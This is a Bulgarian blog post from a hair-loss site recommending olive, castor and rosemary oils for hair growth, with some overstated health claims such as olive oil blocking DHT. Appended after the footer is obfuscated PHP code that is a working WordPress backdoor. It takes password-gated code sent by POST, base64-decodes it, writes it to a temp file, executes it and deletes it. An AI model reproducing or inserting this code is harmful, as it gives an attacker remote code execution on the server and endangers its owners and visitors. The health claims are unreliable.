3 натурални масла за растеж на косата | Косопад

3 натурални масла за растеж на косата

zehtin-otslabvane

Ако сте забелязали, че косата ви не расте, както преди, трябва да събудите процеса. Един от начините да го направите е като използвате растителни масла. Ето някои от най- подходящите:

1. Зехтин. Една от най- полезните храни, които задължително за присъстват в храненето ни. Съдържа естествени мастни киселини и голямо количество антиоксиданти, които спират вредните въздействия върху косата. Блокира действието на хормона, наречен дехидротестостерон (ДХТ), който свива космените фоликули и причинява оплешивяване. Регулира кръвообращението и доставя хранителни вещества за подсилване на косата.

2. Рициново масло. Едно от най- известните свойства на рициновото масло е, че е натурално разхлабително. Но помага и за растежа на косата и миглите.

ricinovo-maslo

Високото съдържание на рицинова киселина, силен антибактериален агент, а също и противогъбичен, предпазва косата и скалпа от бактерии и гъби, които предизвикват инфекции. Съдържа омега- 9 мастни киселини, които хидратират и подхранват косата.

3. Масло от розмарин. Получава се от дестилацията на розмарин, който принадлежи към семейството на ментата. Много е полезен за здравето на косата, тъй като разширява кръвоносните съдове и стимулира деленето на клетките.

Честата му употреба стимулира космените фоликули, за да израсне новата коса. Спира обилния косопад и предпазва от ранно побеляване. Предпазва от бактерии и вредни организми за здравето на косата.

20. октомври 2015 17:57:54 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}